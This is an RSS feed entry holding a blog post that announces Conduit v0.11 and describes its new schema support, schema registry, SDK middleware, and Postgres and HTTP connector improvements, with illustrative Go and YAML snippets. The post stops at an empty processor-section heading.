isPermaLink="false">https://meroxa.com/blog/conduit-v011-unveils-powerful-schema-support-for-enhanced-data-integration</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Mon, 19 Aug 2024 17:35:07 GMT</pubDate><content:encoded>&lt;p&gt;We made it, Conduit v0.11 is here! In this latest release, we’ve focused on adding schema support, enabling you to detect schema changes and retain type information end-to-end. Our commitment is to make data integration more efficient and user-friendly, helping you optimize your data streaming workflows.&lt;/p&gt;
&lt;h2&gt;Schema Support&lt;/h2&gt;
&lt;p&gt;With the release of Conduit v0.11, one of the most significant enhancements is the support for schemas.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Highlights of Conduit v0.11&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Schema Support&lt;/strong&gt;: Manage and detect schema changes seamlessly. Conduit now preserves type information end-to-end, ensuring data integrity and type safety throughout the pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema Registry&lt;/strong&gt;: Integrated schema registry within Conduit, with compatibility for Confluent Schema Registry. Easily manage and fetch schemas without deploying separate services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connector Enhancements&lt;/strong&gt;: New and improved connector SDK for working with schemas, simplifying the process of data encoding, decoding, and transformation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processor Improvements&lt;/strong&gt;: Enhanced processor SDK with schema support, allowing for more accurate and reliable data processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Documentation Search&lt;/strong&gt;: Quickly find the information you need with our new search feature in the Conduit documentation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;The primary benefits of schema support include:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data Integrity: Ensures that data adheres to the expected structure, reducing the risk of errors and inconsistencies.&lt;/li&gt;
&lt;li&gt;Type Safety: Retains type information throughout the data pipeline, allowing for safe and accurate data processing.&lt;/li&gt;
&lt;li&gt;Future-Proofing: Prepares the system to handle evolving data structures, making it easier to adapt to changes without significant disruptions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the following sections, we will delve into the specifics of how schema support is implemented in Conduit, including the schema registry, connectors, processors, and additions to the OpenCDC record format.&lt;/p&gt;
&lt;h3&gt;Schema Registry&lt;/h3&gt;
&lt;p&gt;The Schema Registry is now a built-in component of Conduit, enabling the usage of schemas in Conduit pipelines out of the box without deploying a separate service.&lt;/p&gt;
&lt;p&gt;Check out the source of the &lt;a href=&quot;https://github.com/conduitIO/conduit-schema-registry&quot;&gt;Conduit Schema Registry&lt;/a&gt;. It is written in Go, meaning that it can be compiled into Conduit and is used internally as the default schema registry. We have also written a test suite, which runs against our schema registry as well as the Confluent Schema Registry, ensuring their compatibility. The Conduit Schema Registry currently supports only a subset of the Confluent Schema Registry&apos;s features; however, the long-term goal is to make it fully compatible and to allow it to run as a standalone service.&lt;/p&gt;
&lt;p&gt;Conduit also allows you to configure an external schema registry that’s compatible with the Confluent Schema Registry API.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;schema-registry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;confluent&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;confluent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connection-string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8085&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This snippet of the &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; file shows how to configure Conduit to connect to a Confluent Schema Registry instance. Check out the &lt;a href=&quot;https://conduit.io/docs/features/schema-support/#schema-registry&quot;&gt;documentation&lt;/a&gt; for more information.&lt;/p&gt;
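&lt;p&gt;If you want to sanity-check the registry before pointing Conduit at it, a Confluent-compatible registry exposes a REST API whose &lt;code class=&quot;language-text&quot;&gt;GET /subjects&lt;/code&gt; endpoint returns a JSON array of registered subjects. The sketch below only parses such a response; the sample body is made up, and in practice you would fetch it from the connection string configured above:&lt;/p&gt;

```go
package main

import (
	"encoding/json"
	"fmt"
)

// parseSubjects decodes the JSON array returned by a Confluent-compatible
// registry's GET /subjects endpoint (e.g. http://localhost:8085/subjects).
func parseSubjects(body []byte) ([]string, error) {
	var subjects []string
	if err := json.Unmarshal(body, &subjects); err != nil {
		return nil, err
	}
	return subjects, nil
}

func main() {
	// Sample response body; a live registry returns the subjects that
	// your pipelines have registered.
	body := []byte(`["orders-key","orders-value"]`)
	subjects, err := parseSubjects(body)
	if err != nil {
		panic(err)
	}
	fmt.Println(subjects) // the registered subjects
}
```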
&lt;h3&gt;Schemas and OpenCDC records&lt;/h3&gt;
&lt;p&gt;We have added support for attaching schemas to OpenCDC records by introducing four standard metadata fields. These fields provide the required information to identify and fetch a specific schema from a schema registry.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.key.schema.subject&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;opencdc.key.schema.version&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;These fields contain the schema subject and version for the data in the &lt;code class=&quot;language-text&quot;&gt;.Key&lt;/code&gt; field of the OpenCDC record.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;opencdc.payload.schema.subject&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;opencdc.payload.schema.version&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;These fields contain the schema subject and version for the data in the &lt;code class=&quot;language-text&quot;&gt;.Payload.Before&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;.Payload.After&lt;/code&gt; fields.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
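&lt;p&gt;To make this concrete, here is a minimal, self-contained sketch of how the four fields might look inside a record&apos;s metadata. The field names are exactly the ones listed above; the &lt;code class=&quot;language-text&quot;&gt;Metadata&lt;/code&gt; type and the sample values are illustrative, not the conduit-commons API:&lt;/p&gt;

```go
package main

import "fmt"

// Metadata models an OpenCDC record's metadata as a plain string map.
type Metadata map[string]string

// The four standard schema-related metadata fields.
const (
	KeySchemaSubject     = "opencdc.key.schema.subject"
	KeySchemaVersion     = "opencdc.key.schema.version"
	PayloadSchemaSubject = "opencdc.payload.schema.subject"
	PayloadSchemaVersion = "opencdc.payload.schema.version"
)

func main() {
	md := Metadata{
		KeySchemaSubject:     "users-key",
		KeySchemaVersion:     "1",
		PayloadSchemaSubject: "users-payload",
		PayloadSchemaVersion: "3",
	}
	// Subject and version together identify one exact schema in the registry.
	fmt.Printf("payload schema: %s v%s\n", md[PayloadSchemaSubject], md[PayloadSchemaVersion])
}
```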
&lt;h3&gt;Connectors&lt;/h3&gt;
&lt;p&gt;The latest &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt; includes several enhancements to simplify working with schemas.&lt;/p&gt;
&lt;p&gt;First, we introduced the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk/schema&quot;&gt;schema&lt;/a&gt; package, which contains utilities for retrieving and creating schemas in connectors. These utilities interact with Conduit’s Schema Registry. The returned schema can be used to encode and decode data, as well as traverse the schema and apply it to the destination resource (e.g. creating a destination table with the correct types).&lt;/p&gt;
&lt;p&gt;Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; myConnector

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;context&quot;&lt;/span&gt;

	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-connector-sdk/schema&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-commons/opencdc&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;/* ... */&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keyVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keyVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetPayloadSchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetPayloadSchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadSchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// use keySchema and payloadSchema ...&lt;/span&gt;
		&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSchema
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We also introduced source middleware that extracts an &lt;a href=&quot;https://avro.apache.org&quot;&gt;Avro&lt;/a&gt; schema from structured data and encodes the value into Avro raw data. This alleviates the issue of losing type information, which previously affected &lt;a href=&quot;https://conduit.io/docs/connectors/behavior/#standalone-vs-built-in-connectors&quot;&gt;standalone connectors&lt;/a&gt;. The source middleware is enabled by default in all connectors using the latest connector SDK, meaning that connectors don’t need any specific code to benefit from schema support.&lt;/p&gt;
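&lt;p&gt;To build intuition for what the source middleware does, here is a deliberately simplified toy (not the SDK&apos;s actual code) that infers a field-to-type mapping from structured data, similar in spirit to deriving an Avro schema from a record&apos;s payload:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"sort"
)

// inferAvroType maps a Go value to a rough Avro type name. This is only a
// sketch of the idea; the SDK's middleware builds real Avro schemas.
func inferAvroType(v any) string {
	switch v.(type) {
	case bool:
		return "boolean"
	case int, int32:
		return "int"
	case int64:
		return "long"
	case float32:
		return "float"
	case float64:
		return "double"
	case []byte:
		return "bytes"
	default:
		return "string" // fallback for this sketch
	}
}

// inferSchema builds a sorted "field:type" listing from structured data.
func inferSchema(structured map[string]any) []string {
	fields := make([]string, 0, len(structured))
	for name, value := range structured {
		fields = append(fields, name+":"+inferAvroType(value))
	}
	sort.Strings(fields) // deterministic order for display
	return fields
}

func main() {
	rec := map[string]any{"id": int64(42), "email": "ada@example.com", "active": true}
	fmt.Println(inferSchema(rec))
}
```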
&lt;p&gt;Additionally, all destination connectors benefit from another middleware, which works in the opposite manner to the source middleware. If a record contains the new metadata fields with a subject and version, it will fetch the schema and decode the data into structured data. This ensures that both the destination and source connectors can work with structured data while preserving the correct type information end-to-end.&lt;/p&gt;
&lt;p&gt;To find out more about the source and destination middleware, check out &lt;a href=&quot;https://www.notion.so/meroxa/TODO&quot;&gt;the middleware documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Processors&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/conduitio/conduit-processor-sdk&quot;&gt;Processor SDK&lt;/a&gt; now includes schema support, similar to the Connector SDK, making it easier to work with structured data in processors.&lt;/p&gt;
&lt;p&gt;We have introduced a &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-processor-sdk/schema&quot;&gt;schema&lt;/a&gt; package in the processor SDK, which can be used to interact with Conduit’s Schema Registry. This package allows processors to retrieve and create schemas, ensuring that type information is preserved throughout data processing.&lt;/p&gt;
&lt;p&gt;Here’s a snippet of how you could interact with the new schema package:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; myProcessor

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;context&quot;&lt;/span&gt;

	sdk &lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-processor-sdk&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-processor-sdk/schema&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-commons/opencdc&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;/* ... */&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;p &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Processor&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ProcessedRecord &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keyVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keyVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetPayloadSchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetPayloadSchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadSchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// use keySchema and payloadSchema ...&lt;/span&gt;
		&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSchema
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// return the processed records here&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Additionally, processors are equipped with new middleware that automatically handles the encoding and decoding of data in records that have an attached schema. The middleware detects changes in data (e.g. new fields, deleted fields, changed field types) and updates the schema, bumping its version according to the applied changes. This middleware is enabled by default for all processors, ensuring seamless schema management without requiring any additional code in the processor implementation.&lt;/p&gt;
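&lt;p&gt;The version-bumping behavior can be pictured with a small sketch. This is an illustration of the idea only: the real middleware compares full Avro schemas, while this toy compares flat field maps:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"reflect"
)

// schemaFields maps field names to type names, a flat stand-in for a schema.
type schemaFields map[string]string

// bumpIfChanged returns the schema version to use next: the current version
// when nothing changed, or current+1 when fields were added, removed, or
// retyped. A toy model of what the processor middleware automates.
func bumpIfChanged(current int, old, updated schemaFields) int {
	if reflect.DeepEqual(old, updated) {
		return current
	}
	return current + 1
}

func main() {
	v1 := schemaFields{"id": "long", "email": "string"}
	v2 := schemaFields{"id": "long", "email": "string", "active": "boolean"} // field added
	fmt.Println(bumpIfChanged(1, v1, v1)) // unchanged: stays at 1
	fmt.Println(bumpIfChanged(1, v1, v2)) // changed: bumps to 2
}
```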
&lt;h2&gt;Other improvements&lt;/h2&gt;
&lt;p&gt;Apart from the schema support, we have added several other improvements in v0.11.&lt;/p&gt;
&lt;h3&gt;Documentation search&lt;/h3&gt;
&lt;p&gt;One of the most significant additions to our &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;documentation&lt;/a&gt; is the introduction of a &lt;a href=&quot;https://conduit.io/docs/search/&quot;&gt;search bar&lt;/a&gt;. The search bar allows users to quickly locate the content they are looking for. This feature is especially useful for newcomers who are getting acquainted with Conduit, as it reduces the time spent navigating the documentation.&lt;/p&gt;
&lt;h3&gt;Connector improvements&lt;/h3&gt;
&lt;h3&gt;Postgres connector&lt;/h3&gt;
&lt;p&gt;The latest release of the Postgres connector includes support for incremental snapshots in logical replication mode. This feature allows for safely executing snapshots of the current state before starting to stream changes. It is especially important for large tables, which can take hours or even days to snapshot. With this enhancement, an interrupted snapshot can be resumed from the last successfully synced position.&lt;/p&gt;
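&lt;p&gt;The resumption logic can be sketched as keyset pagination over the primary key, where the last emitted key is persisted as the snapshot position (a simplified illustration, not the connector&apos;s actual implementation):&lt;/p&gt;

```go
package main

import "fmt"

type row struct{ id int }

// fetchBatch stands in for a query like
// `SELECT ... WHERE id > $1 ORDER BY id LIMIT $2`.
func fetchBatch(table []row, afterID, limit int) []row {
	var out []row
	for _, r := range table {
		if r.id > afterID {
			out = append(out, r)
			if len(out) == limit {
				break
			}
		}
	}
	return out
}

// snapshot emits rows in key order, starting after the given position.
// Because the position advances with every emitted row, an interrupted
// snapshot can be resumed from the last successfully synced key instead
// of rescanning the whole table.
func snapshot(table []row, startAfter int) (lastID int) {
	lastID = startAfter
	for {
		batch := fetchBatch(table, lastID, 2)
		if len(batch) == 0 {
			return lastID
		}
		for _, r := range batch {
			fmt.Println("emit row", r.id)
			lastID = r.id // persisted as the record's position
		}
	}
}

func main() {
	table := []row{{1}, {2}, {3}, {4}, {5}}
	// An earlier run was interrupted after emitting id 3; resume from there.
	last := snapshot(table, 3)
	fmt.Println("snapshot complete, last position:", last) // last position: 5
}
```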
&lt;p&gt;We also improved the management of logical replication slots, ensuring that slots created by Conduit are cleaned up when the pipeline is deleted.&lt;/p&gt;
&lt;p&gt;These changes are included in the built-in Postgres connector; you can also check out the connector&apos;s source &lt;a href=&quot;https://github.com/conduitIO/conduit-connector-postgres&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;HTTP connector&lt;/h3&gt;
&lt;p&gt;The source connector has now become more flexible, allowing you to use &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http/blob/main/source_test.go#L171-L176&quot;&gt;JavaScript to specify the behavior&lt;/a&gt; for getting the request data and for parsing the response.&lt;/p&gt;
&lt;p&gt;In the destination connector, we have added the ability to build the URL of the request using data from the incoming records.&lt;/p&gt;
&lt;p&gt;Check out the HTTP connector source &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Processor improvements&lt;/h3&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt;&lt;/h3&gt;
